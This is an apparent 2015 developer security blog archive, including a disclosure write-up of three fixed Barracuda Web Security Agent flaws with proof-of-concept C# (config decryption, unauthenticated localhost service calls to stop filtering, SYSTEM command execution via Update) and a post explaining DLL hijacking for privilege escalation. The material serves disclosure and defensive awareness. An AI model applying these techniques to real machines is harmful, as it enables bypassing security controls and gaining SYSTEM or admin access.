Wednesday, 18 November 2015

Reinventing The Wheel

In business, it generally doesn’t make sense to reinvent the wheel. Why spend time and resources developing something that already exists commercially?

For personal development projects, though, it’s a great way to appreciate the amount of work that went into the existing solutions. Plus, it can be customized to behave however you’d like.

Lately, I’ve been working on a tool to take a domain name, suggest similar names, and then check to see if those sites are active.

The primary use will be in discovering and reporting domains being used for typosquatting or fraud. There are existing tools, like dnstwist, but I figured it might be fun to attempt something similar on my own.
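
Just to give a flavor of the approach, here’s a minimal C# sketch of the first two steps: generate naive typo variants (single-character omissions and adjacent swaps; dnstwist covers far more, like homoglyphs and bitsquatting) and check whether each one resolves in DNS. The “example” domain is a placeholder, and this isn’t the actual tool’s code, just the general idea:

```csharp
using System;
using System.Collections.Generic;
using System.Net;
using System.Net.Sockets;

class DomainVariants
{
    // Generate a few naive typo variants: single-character omissions and adjacent swaps.
    static IEnumerable<string> Variants(string name, string tld)
    {
        var seen = new HashSet<string>();

        for (int i = 0; i < name.Length; i++)
        {
            string omission = name.Remove(i, 1);
            if (omission.Length > 0 && seen.Add(omission))
                yield return omission + "." + tld;
        }

        for (int i = 0; i < name.Length - 1; i++)
        {
            char[] c = name.ToCharArray();
            char tmp = c[i]; c[i] = c[i + 1]; c[i + 1] = tmp;
            string swapped = new string(c);
            if (swapped != name && seen.Add(swapped))
                yield return swapped + "." + tld;
        }
    }

    static void Main()
    {
        foreach (string candidate in Variants("example", "com"))
        {
            try
            {
                // A successful lookup suggests the domain is registered and active.
                IPHostEntry entry = Dns.GetHostEntry(candidate);
                Console.WriteLine("{0} -> {1}", candidate, entry.AddressList[0]);
            }
            catch (SocketException)
            {
                // No DNS answer; likely unregistered (or registered but not resolving).
            }
        }
    }
}
```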

My tool will allow me to define which domains I’m interested in monitoring out of the automatically-suggested list (since some are just super unlikely) and perform periodic checks against them. It’ll also grab a thumbnail image of the site (if a website for the domain exists) and maybe some metadata… and allow me to add my own notes.

This will let me identify active domains with names similar to the ones I’m interested in, while excluding sites I’ve identified as legitimate. By periodically evaluating the registration data, I can also flag domains as needing review. That way, if I identify XYZ.com as legitimate but it changes hands a year later, I won’t keep treating it the same as the XYZ.com I originally reviewed.

I’m doing it all in my free time. Since I don’t have a whole lot of that these days, things are progressing quite slowly. Still, though… it’s fun. That’s what’s important, right?

Tuesday, 29 September 2015

Catch And Release: Barracuda WSA

*** EXECUTIVE SUMMARY ***

While reviewing Barracuda Networks’ Web Security Agent (WSA), I identified three security vulnerabilities.

Exploitation of these vulnerabilities allows the disclosure and alteration of local WSA settings, the shutting down of the WSA service, and local elevation of privilege allowing code execution as SYSTEM.

These issues were initially discovered in version 4.3.1.53 of WSA. They were responsibly disclosed in early June 2015 and were fully resolved at the end of September, as part of the 4.4.1 release.

*** WALKTHROUGH ***

I’m purposely leaving the details out of this section for now. Developers interested in evaluating the security posture of their applications will hopefully get something out of it, but there’s no reason to rush with the details until users have had a chance to update away from the vulnerable versions. [UPDATE: As of 03/16/2016, details are now included.]

The premise was simple — get around WSA.

There weren’t any obvious results on Google, exploit-db, etc. for known flaws, so I was on my own.

Interacting with the system tray icon for WSA didn’t reveal a whole lot. I noticed that some actions (like Sync or Ping Service Hosts) seemed to briefly turn WSA off and then back on. It was only for a few seconds at most, though. I needed more.

I found the installation location for WSA, hoping it might have some really obvious weaknesses, but nothing really jumped out at me. There was a configuration tool. I decided to start with that.

Some of the applications, including the configuration tool, were .NET assemblies. That meant I would be able to use ILSpy to see what was going on behind the scenes, assuming the code hadn’t been obfuscated. Amazingly enough, it wasn’t. The decompiled code was nice and readable.

Immediately, I spotted something. The configuration tool was checking whether the password entered by the user matched the value from its settings. Score! If the application was reading the password, that meant I could, too.

After loading the configuration tool and then Visual Studio, both with elevated rights, I attached to the configuration tool’s process. That way, when I submitted a password to the tool, I could see the value it was being compared against. I then re-ran the configuration tool, entered the password I had just found, and was in. I now had the ability to view and change settings.

It was a start… but requiring admin rights isn’t exactly a ‘bypass’. I wanted to see just how far I could take it.

Thus, the first vulnerability was discovered…

WSA service has decryptable config that is readable by local users (BNSEC-6054)

Using ILSpy, I was able to find the encrypted .INI file that WSA kept all of the settings in. I took a brief look at the library it used, pwe.dll, to figure out how it was encrypting/decrypting the file’s contents. It wasn’t a .NET assembly, so my progress with that didn’t get very far. Thankfully, I realized there was an even easier way… I could just call pwe.dll directly, the same way the WSA executables did.

As a first attempt, I read the file directly through some proof-of-concept code in C#, called the library, and got back a string with all of the settings. Awesome.
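
The call itself boils down to a single P/Invoke. Here’s a rough sketch of the shape of it; the export name, signature, and file path below are placeholders for illustration, since the real ones come from seeing how the WSA executables invoke pwe.dll:

```csharp
using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Text;

class PwePoc
{
    // Hypothetical export name and signature, for illustration only.
    [DllImport("pwe.dll", CallingConvention = CallingConvention.Cdecl, CharSet = CharSet.Ansi)]
    static extern int DecryptSettings(byte[] input, int inputLength, StringBuilder output, int outputCapacity);

    static void Main()
    {
        // Placeholder path for wherever WSA keeps its encrypted .INI file.
        byte[] encrypted = File.ReadAllBytes(@"C:\Program Files\Barracuda\WSA\config.ini");

        var plaintext = new StringBuilder(64 * 1024);
        int rc = DecryptSettings(encrypted, encrypted.Length, plaintext, plaintext.Capacity);

        Console.WriteLine(rc == 0 ? plaintext.ToString() : "call failed: " + rc);
    }
}
```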

Of primary interest, of course, was the configuration password. Given how often users/organizations reuse their passwords, knowing the WSA password could potentially give an attacker leverage against other systems or applications.

Having a list of whitelisted applications was also handy. That provided my first way around WSA. If ‘example.exe’ was whitelisted, I could simply rename my browser, malicious code, or whatever to match that name and WSA wouldn’t try to filter or monitor it. Knowing the IP ranges and domains excluded from filtering could be advantageous, too.

Now that I had a way around WSA if I wanted, I decided to make it harder on myself… Rather than just skirting around the filter, I wanted to see if I could actually mess with it.

That led to my second vulnerability finding….

WSA service allows for arbitrary local reconfiguration at net.tcp://127.0.0.1:32323/ (BNSEC-6053, later absorbed into BNSEC-6147)

ILSpy made things incredibly easy. The service had a listener on 127.0.0.1 and there didn’t seem to be any authentication required. The WSAMonitor app, which runs in the system tray, provided all of the information I needed to take advantage of the listener.

I wrote a bit more code and called net.tcp://127.0.0.1:32323/StopService. The service stopped. Or I guess I should say that the filtering stopped; the Windows service was still running. I ultimately had to verify that the stop occurred by looking at log entries in the WSA.log file. I was also able to verify it through a website provided by Barracuda that shows whether or not WSA is filtering traffic. The agent’s icon in the system tray remained unchanged, though, as if it was still connected. This meant WSA could be disabled without the user or an admin noticing.

I also eventually wrote calls to GetSettings and SetSettings, allowing me to more easily read and alter the local WSA settings. Any changes would be reset by the next policy sync, but it gave enough of a window to make the changes I wanted. Changing the password was fun, but I also realized that changing how often service hosts get evaluated helped alleviate some of the issues I had with the program. Setting the interval to -1 disabled the automatic pinging of the hosts, which normally was happening every five minutes.
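
For those curious, the PoC was essentially a small WCF client. Here’s a minimal sketch; the interface name, operation signatures, and binding settings are assumptions (the real contract is whatever ILSpy shows inside WSAMonitor), with only the operation names taken from above:

```csharp
using System;
using System.ServiceModel;

// Placeholder contract: only the operation names come from the walkthrough above.
[ServiceContract]
public interface IWsaControl
{
    [OperationContract] void StopService();
    [OperationContract] string GetSettings();
    [OperationContract] void SetSettings(string settings);
}

class WsaClient
{
    static void Main()
    {
        var factory = new ChannelFactory<IWsaControl>(
            new NetTcpBinding(SecurityMode.None),                 // binding details are an assumption
            new EndpointAddress("net.tcp://127.0.0.1:32323/"));

        IWsaControl wsa = factory.CreateChannel();

        wsa.StopService();                       // filtering stops; the tray icon never changes
        Console.WriteLine(wsa.GetSettings());    // dump the current local settings

        ((IClientChannel)wsa).Close();
        factory.Close();
    }
}
```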

As much fun as I had trying to find ways around WSA, I knew that if I could find these methods, the ‘bad guys’ could, too.

Though Barracuda has a pretty nice bug bounty program through Bugcrowd, WSA apparently isn’t within its scope. Ultimately, I ended up submitting the issue to CERT’s CVE system and also sent the details via encrypted emails to the Barracuda security team.

A few days after my submission, I took one last look at the WSA code, looking for anything I might have missed.

That’s when I discovered the third vulnerability…

WSA local EoP to SYSTEM via net.tcp://127.0.0.1:32323/Update (BNSEC-6147)

This one was really straightforward. I think I had glossed over it initially because I was simply focused on evading WSA, rather than exploiting it.

The danger of this routine was that it was too trusting. It accepted a filename and arguments and would execute the process as the service (which runs as SYSTEM). Not good.
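
A sketch of what abusing it might look like, in the same style as the earlier client; the Update operation’s exact signature and the payload command are assumptions:

```csharp
using System.ServiceModel;

[ServiceContract]
public interface IWsaUpdate
{
    // Assumed signature: a file name plus arguments, run by the service as SYSTEM.
    [OperationContract] void Update(string fileName, string arguments);
}

class UpdatePoc
{
    static void Main()
    {
        var factory = new ChannelFactory<IWsaUpdate>(
            new NetTcpBinding(SecurityMode.None),
            new EndpointAddress("net.tcp://127.0.0.1:32323/"));

        IWsaUpdate wsa = factory.CreateChannel();

        // Anything passed here would have executed in the SYSTEM context.
        wsa.Update(@"C:\Windows\System32\cmd.exe", @"/c whoami > C:\Windows\Temp\proof.txt");

        ((IClientChannel)wsa).Close();
        factory.Close();
    }
}
```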

As soon as I found it, I reported it the same way as the others. Barracuda was quick to acknowledge the issue and provided a reasonable timeline that it would get fixed.

The fix for this was simple enough. Just remove all of the parameters, so calling Update can only do one thing — run the update.

*** OVERALL EXPERIENCE ***

Throughout the entire process, I couldn’t have asked for a better contact at Barracuda than Justin Kelly. He and the rest of the BNSEC team did a great job keeping me in the loop. Justin provided the perfect blend of professionalism and casualness. It was clear that they were taking things seriously on their end, but I never got the feeling that they were going to go Oracle-style on me with legal threats for picking apart their product a bit. I’m looking forward to working with them more in the future.

Sunday, 27 September 2015

DLL Hijacking


I’ve been having a lot of fun recently with DLL Hijacking. It’s been around for quite a few years now, and the ‘best practice’ recommended by Microsoft is to fully qualify the DLL paths.

Quite a lot of applications don’t do this, however…

Thankfully, Windows has gotten quite a bit smarter over the years when it comes to this sort of thing. Microsoft altered the priority of the paths being searched, which significantly cut down on the impact to most applications. Additionally, some core DLLs are set up in such a way that even if an explicit path is given, Windows will ignore it in favor of where it knows the ‘good’ copy is.

The MSDN documentation provides some pretty useful information on the way searching happens.

  1. If a DLL with the same module name is already loaded in memory, the system checks only for redirection and a manifest before resolving to the loaded DLL, no matter which directory it is in. The system does not search for the DLL.
  2. If the DLL is on the list of known DLLs for the version of Windows on which the application is running, the system uses its copy of the known DLL (and the known DLL’s dependent DLLs, if any) instead of searching for the DLL. For a list of known DLLs on the current system, see the following registry key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs.
  3. If a DLL has dependencies, the system searches for the dependent DLLs as if they were loaded with just their module names. This is true even if the first DLL was loaded by specifying a full path.

The first and last items were interesting to me.
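
The second item is also easy to check for yourself; here’s a quick snippet that dumps the KnownDLLs list from the registry key quoted above:

```csharp
using System;
using Microsoft.Win32;

class DumpKnownDlls
{
    static void Main()
    {
        // Key path is taken directly from the MSDN excerpt above.
        using (RegistryKey key = Registry.LocalMachine.OpenSubKey(
            @"SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs"))
        {
            if (key == null) return;

            foreach (string name in key.GetValueNames())
                Console.WriteLine("{0} = {1}", name, key.GetValue(name));
        }
    }
}
```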

But, really, it’s even simpler if the application you’re looking to hijack is installed outside of the usual “Program Files” or “Program Files (x86)” directories. At least when an application is installed in one of those folders, local admin rights are needed to write to them. But if the program is installed to its own folder, plenty of fun can be had…

One such example I’ve had success with in my home environment is the BGInfo utility, from Sysinternals. It’s a popular utility with system administrators and generally seems to get installed in C:\bginfo\ (which doesn’t have any built-in protections, by default). It looks like I wasn’t the only one who found it to be a worthwhile target.

This allows a custom DLL to be added to the directory (by a tech-savvy user, malware, an attacker, etc.) without any special rights being needed.
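
A quick way to spot this kind of target is to check whether a directory grants write access to ordinary users. Here’s a rough sketch (C:\bginfo is just the example path from above, and the check is intentionally simplistic):

```csharp
using System;
using System.IO;
using System.Security.AccessControl;
using System.Security.Principal;

class WritableDirCheck
{
    static void Main()
    {
        string target = @"C:\bginfo";   // example install path from above

        DirectorySecurity acl = new DirectoryInfo(target).GetAccessControl();
        var users = new SecurityIdentifier(WellKnownSidType.BuiltinUsersSid, null);
        var authUsers = new SecurityIdentifier(WellKnownSidType.AuthenticatedUserSid, null);

        foreach (FileSystemAccessRule rule in acl.GetAccessRules(true, true, typeof(SecurityIdentifier)))
        {
            bool broadPrincipal = rule.IdentityReference.Equals(users)
                               || rule.IdentityReference.Equals(authUsers);
            bool canWrite = (rule.FileSystemRights & FileSystemRights.WriteData) != 0;

            if (rule.AccessControlType == AccessControlType.Allow && broadPrincipal && canWrite)
            {
                Console.WriteLine("Non-admin users can drop files into " + target);
                return;
            }
        }

        Console.WriteLine("No obvious non-admin write access to " + target);
    }
}
```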

Using Procmon, also from Sysinternals, I was able to see that one of the libraries BGInfo uses is version.dll.

I found the legitimate file and made my own DLL with the same name and exported functions. All requests made to it get forwarded to the appropriate routine in the legitimate version.dll file (so the program continues to work as expected). I also added my own custom payload to the DLL’s initial execution. That payload gets run under the context of the account executing BGInfo.exe.

As a proof-of-concept, I simply added a message box. If this had been a real exploit, however, there’s a lot more potential for abuse…

At most organizations, BGInfo gets executed upon login by all users… which includes local administrators and potentially domain administrators. Just let that sink in for a bit… Here’s code provided by a non-admin, malware, etc. and it’s getting automatically executed by an admin. Ouch!

Granted, it’s a bit of a waiting game… but it can allow for some rather easy elevation of privileges… Especially if logins by local administrators happen pretty frequently.

What if domain admins don’t do local logins? No problem. Use the initial DLL hijacking to execute code as a local admin. From there, additional hijacking of programs commonly used by domain admins (via Run As…) can be done without a whole lot of additional effort.

This can also lead to pass-the-hash attacks, spreading similar attacks to other machines on the network, etc.

All in all… it’s bad news for an enterprise.

Even if no admins (local or otherwise) execute the DLL-hijacked application, the attacker still has persistent code that launches whenever the program does (which is at login, in the case of BGInfo). Probably not ideal.

If there isn’t an obviously-exploitable program in an unprotected directory, though… what then? I’ve had a surprising amount of success dropping hijacked DLLs into the current user’s AppData temp directory. Using my same tainted version.dll from earlier, I was able to trigger my ‘rogue code’ during a Notepad++ update. Pretty handy.

The moral of the story is… fully qualify your DLL paths. And even if you do, be aware of potential DLL hijacking through the dependencies of the DLLs you are fully qualifying. If it can be abused… it probably will be.

Next on my list of techniques to get more familiar with is DLL Injection. Seems like it’ll be a lot of fun, too.

Wednesday, 12 August 2015

The All-Knowing-Oracle

Oracle’s CSO, Mary Ann Davidson, provided a wonderful example of how not to handle having your products reverse engineered.

Her original post has been removed, but there’s a copy of it on Scribd. It’s worth reading, if you haven’t seen it yet.

I think I get where she was coming from in her original post. If people are using automated static analysis tools to report issues, and those reports either aren’t actually security issues or cover things Oracle is already aware of and working on, I can certainly understand how that might be a drain on their resources; their time could be better spent finding real issues themselves.

That being said, I can’t believe that a company — especially one the size of Oracle — can think that the “Pay no attention to the man behind the curtain” approach is an effective strategy.

People are going to try to look at your code. Even if not your customers, the ‘bad guys’ certainly will. Taking a stance of “if there’s a security issue, we’ll find it on our own” isn’t helping anyone.

Ultimately, if someone running automated tools or performing a basic static analysis is able to uncover actual issues in Oracle’s products, that’s stuff Oracle should have found on its own. If it’s mostly false positives and duplicates that are the issue, Oracle isn’t doing a good job of clearly communicating that to their customers.

I like how Bugcrowd and similar services do it… Companies with a mature security program can define boundaries. There is a monetary incentive to follow the rules and proper procedures. Even if something happens to fall outside the scope of the bug bounty program, the vendor is still likely to work with the researcher to ensure the issue is validated and fixed within a reasonable amount of time.

The biggest downside I see with the current bug-bounty programs is that products not part of the bounty are probably worthwhile targets. The product might not get much attention internally and may simply have been forgotten about. A vendor might also not list it because they already know or suspect there are a lot of bugs in it. Either way, what isn’t part of a bug bounty program can sometimes be even more interesting than what is… at least if you don’t care about the rewards.

Hopefully Oracle will eventually shift more towards the bug bounty style. As it is now, it seems like they take a purely ‘us vs. them’ approach. Where bug bounties really shine, though, is when the internal team is able to collaborate with external researchers.

I wonder how much (if any) competitive advantage the SQL Server platform has over Oracle, given the difference in how Microsoft handles the discovery and reporting of issues in their products versus Oracle. Maybe that could be a motivating factor for them to change their approach…

Saturday, 1 August 2015

Books to read in 2015

Here are five books I’d recommend checking out, if you haven’t already read them.

  • #1 — The Pragmatic Programmer — This is, by far, one of my favorite development books and I recommend everyone read it at least once.
  • #2 — Gray Hat Hacking – The Ethical Hacker’s Handbook — While not specifically geared towards software development, there are plenty of topics that developers should consider giving some thought to.
  • #3 — Threat Modeling: Designing for Security — Even in eBook format, this book is massive. No matter whether you’re building applications for mobile devices, websites, or desktops, there’s something to be gained from this book.
  • #4 — Official (ISC)2 Guide to the CSSLP CBK — Even if you are not going for the CSSLP certification, there are still some great concepts developers should keep in mind throughout the SDLC.
  • #5 — Job Reconnaissance: Using Hacking Skills to Win the Job Hunt Game — Another one that’s not specifically geared towards developers, but I found the advice to be quite useful. Even if you are a highly technical individual, controlling your ‘brand’ is important. I also like the idea of doing a bit of reconnaissance early on to find specific companies of interest, rather than relying on a company to find you.